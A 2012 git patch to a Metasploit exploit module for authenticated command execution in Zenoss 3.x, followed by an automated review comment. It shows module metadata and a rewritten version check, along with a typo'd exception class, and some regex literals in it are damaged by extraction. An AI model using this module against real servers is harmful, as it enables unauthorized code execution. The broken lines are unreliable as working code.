From 2bf0899d09e6b4fd9401bc28929190485272cb2d Mon Sep 17 00:00:00 2001
From: bcoles
Date: Wed, 1 Aug 2012 20:15:45 +0930
Subject: [PATCH] minor improvements to Zenoss showdaemonxmlconfig exploit
---
 ....rb => zenoss_showdaemonxmlconfig_exec.rb} | 31 +++++++++++--------
 1 file changed, 18 insertions(+), 13 deletions(-)
 rename modules/exploits/linux/http/{zenoss_3.2.1_showdaemonxmlconfig_exec.rb => zenoss_showdaemonxmlconfig_exec.rb} (76%)
diff --git a/modules/exploits/linux/http/zenoss_3.2.1_showdaemonxmlconfig_exec.rb b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb
similarity index 76%
rename from modules/exploits/linux/http/zenoss_3.2.1_showdaemonxmlconfig_exec.rb
rename to modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb
index 443272deae..46228854f2 100644
--- a/modules/exploits/linux/http/zenoss_3.2.1_showdaemonxmlconfig_exec.rb
+++ b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb
@@ -6,7 +6,6 @@
 ##
 require 'msf/core'
-require 'msf/core/handler/reverse_tcp'
 class Metasploit3 < Msf::Exploit::Remote
 Rank = GoodRanking
@@ -15,9 +14,9 @@ class Metasploit3 < Msf::Exploit::Remote
 def initialize(info = {})
 super(update_info(info,
- 'Name' => 'Zenoss <= 3.2.1 showDaemonXMLConfig Command Execution',
+ 'Name' => 'Zenoss 3 showDaemonXMLConfig Command Execution',
 'Description' => %q{
- This module exploits a command execution vulnerability in Zenoss <= 3.2.1
+ This module exploits a command execution vulnerability in Zenoss 3.x
 which could be abused to allow authenticated users to execute arbitrary code under the context of the 'zenoss' user. The show_daemon_xml_configs() function in the 'ZenossInfo.py' script calls Popen() with user
@@ -31,10 +30,10 @@ class Metasploit3 < Msf::Exploit::Remote
 ],
 'Author' => [
- 'Brendan Coles ', # Discovery and exploit
+ 'Brendan Coles ', # Discovery and exploit
 ],
 'License' => MSF_LICENSE,
- 'Version' => '$Revision: 2 $',
+ 'Version' => '$Revision: 3 $',
 'Privileged' => false,
 'Arch' => ARCH_CMD,
 'Platform' => 'unix',
@@ -68,15 +67,21 @@ class Metasploit3 < Msf::Exploit::Remote
 def check
+ @peer = "#{rhost}:#{rport}"
 # retrieve software version from login page
- res = send_request_raw({
- 'method' => "GET",
- 'uri' => "/zport/acl_users/cookieAuthHelper/login_form"
- })
- return Exploit::CheckCode::Unknown if res.nil?
- return Exploit::CheckCode::Vulnerable if res.body =~ /

Copyright © 2005-20[\d]{2} Zenoss, Inc\. \| Version\s+3\.2\.1<\/span>/
- return Exploit::CheckCode::Detected if res.body =~ //
- return Exploit::CheckCode::Safe
+ begin
+ res = send_request_raw({
+ 'method' => "GET",
+ 'uri' => "/zport/acl_users/cookieAuthHelper/login_form"
+ })
+ return Exploit::CheckCode::Vulnerable if res.body =~ /

Copyright © 2005-20[\d]{2} Zenoss, Inc\. \| Version\s+3\./
+ return Exploit::CheckCode::Detected if res.body =~ //
+ return Exploit::CheckCode::Safe
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp
+ print_error("#{@peer} - Connection failed")
+ end
+ return Exploit::CheckCode::Unknown
 end
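Review bot: The new `rescue` list in `check` names `::Rex::ConnectionTimeoutp`, which looks like a typo for `::Rex::ConnectionTimeout`; Ruby resolves rescue constants only while matching a raised exception, so any error not caught by the first two classes, including the timeout this was meant to handle, would presumably surface as a NameError instead of reaching `print_error`. The commit also drops `return Exploit::CheckCode::Unknown if res.nil?`, so a request that comes back nil now hits `res.body` and raises NoMethodError; keeping that guard directly after `send_request_raw` inside the `begin` preserves the old Unknown result. Separately, the loosened banner match on `Version\s+3\.` reports `Vulnerable` for every 3.x login page from the version string alone, which can overstate findings on fixed builds; `Exploit::CheckCode::Appears` is the more accurate result for a banner-only match. The regex literals in this hunk are damaged by page extraction and the hunk's trailing context may be cut off, so those parts are not assessed.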